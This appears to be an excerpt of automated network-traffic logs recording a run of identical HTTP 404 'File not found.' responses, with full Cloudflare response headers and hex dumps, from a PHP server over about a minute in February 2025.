Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Thu, 20 Feb 2025 02:44:05 GMTContent-Type: text/html; charset=UTF-8Connection: closeX-Powered-By: PHP/5.4.16Status: 404 Not Foundcf-cache-status: DYNAMICvary: accept-encodingReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=Y3i1BaNRkfT1yxgFhWNLYBZ%2FKIHnn0cMZl67%2BC0%2Ftx04yWhq2c60MCYV%2ButgCLyGtHs0COJ82rbeaAZxtt4NKra3UvpXuxF964%2Fo%2FJsuK1gvkGs2stwKwlefjzc%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 914b2719c92441f2-EWRalt-svc: h3=":443"; ma=86400server-timing: cfL4;desc="?proto=TCP&rtt=1775&min_rtt=1775&rtt_var=887&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=387&delivery_rate=0&cwnd=233&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Thu, 20 Feb 2025 02:44:09 GMTContent-Type: text/html; charset=UTF-8Connection: closeX-Powered-By: PHP/5.4.16Status: 404 Not Foundcf-cache-status: DYNAMICvary: accept-encodingReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=JlnvLbY586dULNONXkGynMrh8TvrO7bG1s61e2QWoKuRFlQuRlGS6FZNmWAWRw9Pan6%2BOPRtP8yRvuOSekGJmXkgEDucU4q%2FZWZ5aHFg1YDDkH97chGhanBuLY8%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 914b2732b83b8c41-EWRalt-svc: h3=":443"; ma=86400server-timing: cfL4;desc="?proto=TCP&rtt=5176&min_rtt=5176&rtt_var=2588&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=387&delivery_rate=0&cwnd=228&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Thu, 20 Feb 2025 02:44:13 GMTContent-Type: text/html; charset=UTF-8Connection: closeX-Powered-By: PHP/5.4.16Status: 404 Not Foundcf-cache-status: DYNAMICvary: accept-encodingReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=GDv3EGIZTvURG9N0DxAH9zQcE1LA5n9T3%2BuWwadW4URMXIbj0lYspm22VA0HAWn34N1t7chuFULtvulAMu10sQhdXUqac%2BupfunMQAPqqu%2FB6f8dhu4Y04773oM%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 914b274b9e2a4408-EWRalt-svc: h3=":443"; ma=86400server-timing: cfL4;desc="?proto=TCP&rtt=1899&min_rtt=1899&rtt_var=949&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=387&delivery_rate=0&cwnd=209&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Thu, 20 Feb 2025 02:44:15 GMTContent-Type: text/html; charset=UTF-8Connection: closeX-Powered-By: PHP/5.4.16Status: 404 Not Foundcf-cache-status: DYNAMICvary: accept-encodingReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=wMIRAQK5kqNqk3IjaX8sMizzQbq5c04w8Es%2FBSo1UUK3g9sT86P8jlmi9GDISR3QOqjIO9QdRkGST3WhCnugzUzEC2n7jxN05QDBeR7Bb0Gearnyu%2BPt26JsrO4%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 914b27579d661831-EWRalt-svc: h3=":443"; ma=86400server-timing: cfL4;desc="?proto=TCP&rtt=1657&min_rtt=1657&rtt_var=828&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=387&delivery_rate=0&cwnd=233&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Thu, 20 Feb 2025 02:44:16 GMTContent-Type: text/html; charset=UTF-8Connection: closeX-Powered-By: PHP/5.4.16Status: 404 Not Foundcf-cache-status: DYNAMICvary: accept-encodingReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=%2F0byYegqHwbK35ecGBWzWJtnW8zt8Omp4NNSRkJowScg37Fe0qm9bRAVbm095t8HSBZc%2BhO8CJuaMt7DM5nt%2BzQicWkhnqTORHc3xPZO%2B8PtIZPMQiEDoEp5ECk%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 914b2763fd190fa5-EWRalt-svc: h3=":443"; ma=86400server-timing: cfL4;desc="?proto=TCP&rtt=1656&min_rtt=1656&rtt_var=828&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=387&delivery_rate=0&cwnd=194&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Thu, 20 Feb 2025 02:44:20 GMTContent-Type: text/html; charset=UTF-8Connection: closeX-Powered-By: PHP/5.4.16Status: 404 Not Foundcf-cache-status: DYNAMICvary: accept-encodingReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=fuUOh1ceCDbq2HS%2B5Pf%2BFfB%2FGo%2BwKFO4%2FGV0LiZn6P%2BbdIkU1oxxW3mRFTBCOkEhfAq6OUMPC04jQrsTx3RFX4oGmq4Mew%2F%2FuoAs0JftJC8%2BClGJrekfM1CeW1o%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 914b277c4a670f39-EWRalt-svc: h3=":443"; ma=86400server-timing: cfL4;desc="?proto=TCP&rtt=1696&min_rtt=1696&rtt_var=848&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=387&delivery_rate=0&cwnd=248&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Thu, 20 Feb 2025 02:44:24 GMTContent-Type: text/html; charset=UTF-8Connection: closeX-Powered-By: PHP/5.4.16Status: 404 Not Foundcf-cache-status: DYNAMICvary: accept-encodingReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=ptuIUR75KS8tw8bcDb%2BFcSUMLmTh3EhuCrygmIuj0In3xq8Ip43ilIcnEpNiEzCA0okudKLOgbB8xBuIAbg%2FWpw2NA4XngcSF%2BK6yMLUMOByvTG9iZNRhY%2BABhQ%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 914b279479af5e72-EWRalt-svc: h3=":443"; ma=86400server-timing: cfL4;desc="?proto=TCP&rtt=1687&min_rtt=1687&rtt_var=843&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=387&delivery_rate=0&cwnd=168&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Thu, 20 Feb 2025 02:44:26 GMTContent-Type: text/html; charset=UTF-8Connection: closeX-Powered-By: PHP/5.4.16Status: 404 Not Foundcf-cache-status: DYNAMICvary: accept-encodingReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=IDihoqYqU67S5uetcitVK4UHIb5KsagWtykkjCcLkasFca%2FaK%2F44yFbyZtajJnA38%2Bv%2FiFFLW%2FwvE81kesCkRitltWoKcK5RkJgFtAob0mO%2FX7XQT0u3nc5SSFY%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 914b27a0eb984385-EWRalt-svc: h3=":443"; ma=86400server-timing: cfL4;desc="?proto=TCP&rtt=1808&min_rtt=1808&rtt_var=904&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=387&delivery_rate=0&cwnd=248&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Thu, 20 Feb 2025 02:44:32 GMTContent-Type: text/html; charset=UTF-8Connection: closeX-Powered-By: PHP/5.4.16Status: 404 Not Foundcf-cache-status: DYNAMICvary: accept-encodingReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=R7NrRZsfZ%2FhuBDCUT22ML6PVv0vgDoI4oSb3qllq17WHUiuvntXghTk1k%2B6jW1BAWoGNClUT3tnWDmxL%2FBB7tbHPPhVgKl5g1ck8arTqV3XzgZvqHJ06uh6XbqI%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 914b27c56afa9e17-EWRalt-svc: h3=":443"; ma=86400server-timing: cfL4;desc="?proto=TCP&rtt=30155&min_rtt=30155&rtt_var=15077&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=387&delivery_rate=0&cwnd=184&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Thu, 20 Feb 2025 02:44:34 GMTContent-Type: text/html; charset=UTF-8Connection: closeX-Powered-By: PHP/5.4.16Status: 404 Not Foundcf-cache-status: DYNAMICvary: accept-encodingReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=QlVnKP8fxsZK4M7JWBoQelzMfh6m4xCl%2FWTRBp2PDTaDAE0bYJTiO33cQ57tnXt%2Fc0SLRkfDfZZJ7cjQbv1ZSY4BBnsiXDTgDlO4mg9jHKtPH6ykNlOprQC2nRc%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 914b27d1fb6b8c17-EWRalt-svc: h3=":443"; ma=86400server-timing: cfL4;desc="?proto=TCP&rtt=2851&min_rtt=2851&rtt_var=1425&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=387&delivery_rate=0&cwnd=231&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Thu, 20 Feb 2025 02:44:38 GMTContent-Type: text/html; charset=UTF-8Connection: closeX-Powered-By: PHP/5.4.16Status: 404 Not Foundcf-cache-status: DYNAMICvary: accept-encodingReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=iT0sYfpk1bLk7UjA7KyekZm5MXTgwsTbmBPqrpYKaUYHQkgzhiN67didNpyIzDUwYiNIGfyuWwvho1MmEe69xEf5U5SrfIO%2Bhcf%2BtkgMY4rWZzHriXZSgQL8eKE%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 914b27ea5e1f8c93-EWRalt-svc: h3=":443"; ma=86400server-timing: cfL4;desc="?proto=TCP&rtt=4099&min_rtt=4099&rtt_var=2049&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=387&delivery_rate=0&cwnd=202&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Thu, 20 Feb 2025 02:44:40 GMTContent-Type: text/html; charset=UTF-8Connection: closeX-Powered-By: PHP/5.4.16Status: 404 Not Foundcf-cache-status: DYNAMICvary: accept-encodingReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=8lWaJJl4sgSv34ZHlRDvKY8BlyQmZLCj86Vs6VrWUjnMJl8655OEpMyDFsSJt%2Fgnb3qgq9eR%2BCqKVsyHN9YKqrzB%2Bas0o5hGHz2kl8%2Bo6dgNjU%2B%2Bakj5%2FLyu3Bw%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 914b27f6c9130f67-EWRalt-svc: h3=":443"; ma=86400server-timing: cfL4;desc="?proto=TCP&rtt=1773&min_rtt=1773&rtt_var=886&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=387&delivery_rate=0&cwnd=83&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Thu, 20 Feb 2025 02:44:42 GMTContent-Type: text/html; charset=UTF-8Connection: closeX-Powered-By: PHP/5.4.16Status: 404 Not Foundcf-cache-status: DYNAMICvary: accept-encodingReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=xLSdAmAO2ZD10qL3ihpW50sIIxulj8bxXNuVXpqyrLsIPI2QChGp%2FDrf52qT%2FJb2aL8%2FB4xAyo504Gog6015SQStzZinFvoDLVqwnbQ%2BGKkSJZ%2F1iE%2Bmw7wrmfw%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 914b28034aefc40c-EWRalt-svc: h3=":443"; ma=86400server-timing: cfL4;desc="?proto=TCP&rtt=1705&min_rtt=1705&rtt_var=852&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=387&delivery_rate=0&cwnd=219&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Thu, 20 Feb 2025 02:44:44 GMTContent-Type: text/html; charset=UTF-8Connection: closeX-Powered-By: PHP/5.4.16Status: 404 Not Foundcf-cache-status: DYNAMICvary: accept-encodingReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=LWJkSG1SDUkWglv5PnoHY1ivVyVKM0ipXpzDitiJ3UtNM7A0q5n22zfYX4E%2FeF3sqllvrhJPYZOESMqcosC%2F23HBVbz06SmjvPkyk6l4Rb39iBLPiBLFcNSFuv8%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 914b280edabc1780-EWRalt-svc: h3=":443"; ma=86400server-timing: cfL4;desc="?proto=TCP&rtt=19752&min_rtt=19752&rtt_var=9876&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=387&delivery_rate=0&cwnd=177&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Thu, 20 Feb 2025 02:44:46 GMTContent-Type: text/html; charset=UTF-8Connection: closeX-Powered-By: PHP/5.4.16Status: 404 Not Foundcf-cache-status: DYNAMICvary: accept-encodingReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=srjJ0sjR3gsWhTHwzcAhfCVov4VPkAhvWjHt5HM%2F1OZcmw3eT38N1n4ed%2BO9ipp3RhxO7LeP3fV4lE00WqceY2vc831RyWGCeM4SyMisU%2B1OM2d7y%2FP6x3gGAGY%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 914b281a7aa14381-EWRalt-svc: h3=":443"; ma=86400server-timing: cfL4;desc="?proto=TCP&rtt=1675&min_rtt=1675&rtt_var=837&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=387&delivery_rate=0&cwnd=217&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Thu, 20 Feb 2025 02:44:49 GMTContent-Type: text/html; charset=UTF-8Connection: closeX-Powered-By: PHP/5.4.16Status: 404 Not Foundcf-cache-status: DYNAMICvary: accept-encodingReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=59ZORVe8UUhlf9R%2Fk4TKpWQNesZ3t7sJO4V60IRkRiVqflmhSF47zXdLeZNlVkkxEWR9jYfXmKIHLWzBl6cHmbBBgHXnmQwXOjnYwejuKwHCGdYFAmkZZEId3cw%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 914b2832be13de95-EWRalt-svc: h3=":443"; ma=86400server-timing: cfL4;desc="?proto=TCP&rtt=1641&min_rtt=1641&rtt_var=820&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=387&delivery_rate=0&cwnd=247&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Thu, 20 Feb 2025 02:44:52 GMTContent-Type: text/html; charset=UTF-8Connection: closeX-Powered-By: PHP/5.4.16Status: 404 Not Foundcf-cache-status: DYNAMICvary: accept-encodingReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=ooqTEhxcPW1RLm9%2FD0m0nqp3ZKWx96Mi125WmUMDbkEO9i9e742xCO5SEFJQvJERyudV3KTs%2FypyvnmGMY0U06u%2B0LJ3jxeffEPv3Wkyn74moMZ56maGh5bucME%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 914b283efa6541de-EWRalt-svc: h3=":443"; ma=86400server-timing: cfL4;desc="?proto=TCP&rtt=1737&min_rtt=1737&rtt_var=868&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=387&delivery_rate=0&cwnd=223&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Thu, 20 Feb 2025 02:44:53 GMTContent-Type: text/html; charset=UTF-8Connection: closeX-Powered-By: PHP/5.4.16Status: 404 Not Foundcf-cache-status: DYNAMICvary: accept-encodingReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=DLoOELFBDIro5PoWMCCRykrW%2FexyIv1XjYAKxXGyz%2FU3iCYZm%2Bk4%2F7K37eZmRVkIZWaMRrCaZ%2B9zxtj4Oujq9BH3AITlr0Cz15xEdUOlQbGPw8zOq3tCMtiinS0%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 914b284b4f584235-EWRalt-svc: h3=":443"; ma=86400server-timing: cfL4;desc="?proto=TCP&rtt=1662&min_rtt=1662&rtt_var=831&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=387&delivery_rate=0&cwnd=246&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Thu, 20 Feb 2025 02:44:56 GMTContent-Type: text/html; charset=UTF-8Connection: closeX-Powered-By: PHP/5.4.16Status: 404 Not Foundcf-cache-status: DYNAMICvary: accept-encodingReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=gPHtgvjuxpaSkrVURJCqf3Q41x2pytSbEF2ewt6hN%2BnLxWngKSJCrfn0J81%2B%2FjYswNjxWvhg0oXH4UDMDXRJVnXmO3b3WFQRMAXgVK%2Ft5Gwy9jryDmwRhLxos3g%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 914b2858f8705e60-EWRalt-svc: h3=":443"; ma=86400server-timing: cfL4;desc="?proto=TCP&rtt=1713&min_rtt=1713&rtt_var=856&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=387&delivery_rate=0&cwnd=247&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Thu, 20 Feb 2025 02:44:58 GMTContent-Type: text/html; charset=UTF-8Connection: closeX-Powered-By: PHP/5.4.16Status: 404 Not Foundcf-cache-status: DYNAMICvary: accept-encodingReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=tl7U42EuwOiFWGyhJyo9pxnwLIUcd%2Fbg8%2F37ilCJP7zpL1CnSmN3XN9HdS26f5LUSweheKAE%2BgqG8naJ0VAv8A8%2F49SbodATfSjML3YqTz0OwRuDC10FVA79vtQ%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 914b28655ddd43d3-EWRalt-svc: h3=":443"; ma=86400server-timing: cfL4;desc="?proto=TCP&rtt=7862&min_rtt=7862&rtt_var=3931&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=387&delivery_rate=0&cwnd=239&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Thu, 20 Feb 2025 02:45:00 GMTContent-Type: text/html; charset=UTF-8Connection: closeX-Powered-By: PHP/5.4.16Status: 404 Not Foundcf-cache-status: DYNAMICvary: accept-encodingReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=hKd4Tp9oRmONKV8QDIVBIMlifvGacWKnTUwTAbmkH7Buk60tO8Ejf8pvURROxBDTpWTB439sCrOFVQ7KQlbA79G2AmOoS3emnARkVpm2v4mA%2BqNKNaWGn1cBZew%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 914b2871ab9c4310-EWRalt-svc: h3=":443"; ma=86400server-timing: cfL4;desc="?proto=TCP&rtt=1949&min_rtt=1949&rtt_var=974&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=387&delivery_rate=0&cwnd=224&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Thu, 20 Feb 2025 02:45:02 GMTContent-Type: text/html; charset=UTF-8Connection: closeX-Powered-By: PHP/5.4.16Status: 404 Not Foundcf-cache-status: DYNAMICvary: accept-encodingReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=s2C5UaBfSVGD%2FMraryUrnV3i29eg1ea2mzkYAZoMt2MkMAxgq7AdqHq3nAmbe6TAEJq1BnS7j0F18EclklcCYLc7ihFkDsNrVC9TbG9wEQ30WtLopa3HnuMgTik%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 914b287e18e54379-EWRalt-svc: h3=":443"; ma=86400server-timing: cfL4;desc="?proto=TCP&rtt=1810&min_rtt=1810&rtt_var=905&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=387&delivery_rate=0&cwnd=219&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Thu, 20 Feb 2025 02:45:04 GMTContent-Type: text/html; charset=UTF-8Connection: closeX-Powered-By: PHP/5.4.16Status: 404 Not Foundcf-cache-status: DYNAMICvary: accept-encodingReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=t5AbRsNF01r8gYOntG6Q3E6msi3ief4ivzAv878245PZjemKgXSqe7twYrpmsM7lp6ROmqxPnVJ8FSv6bqu0B3nR%2FxyS7JFCbTYW3gSdLVIrDf8EE5qeYSprFDM%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 914b288a693a6a56-EWRalt-svc: h3=":443"; ma=86400server-timing: cfL4;desc="?proto=TCP&rtt=1751&min_rtt=1751&rtt_var=875&sent=2&recv=4&lost=0&retrans=0&sent_bytes=0&recv_bytes=387&delivery_rate=0&cwnd=206&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Thu, 20 Feb 2025 02:45:06 GMTContent-Type: text/html; charset=UTF-8Connection: closeX-Powered-By: PHP/5.4.16Status: 404 Not Foundcf-cache-status: DYNAMICvary: accept-encodingReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=FtfXM4VZp3ggJcfnDNDt2UWKX4yuOZoUUBEF6n1FVHZQ5kvDm0xIvjmNmH57esI%2F%2BomUZuOObZs1wZl0PoR5BBH454yxDHrdWiSk3%2BX3eFpKhk%2Fd5HNMQJg1QiI%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 914b28979cf042be-EWRalt-svc: h3=":443"; ma=86400server-timing: cfL4;desc="?proto=TCP&rtt=1727&min_rtt=1727&rtt_var=863&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=387&delivery_rate=0&cwnd=218&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
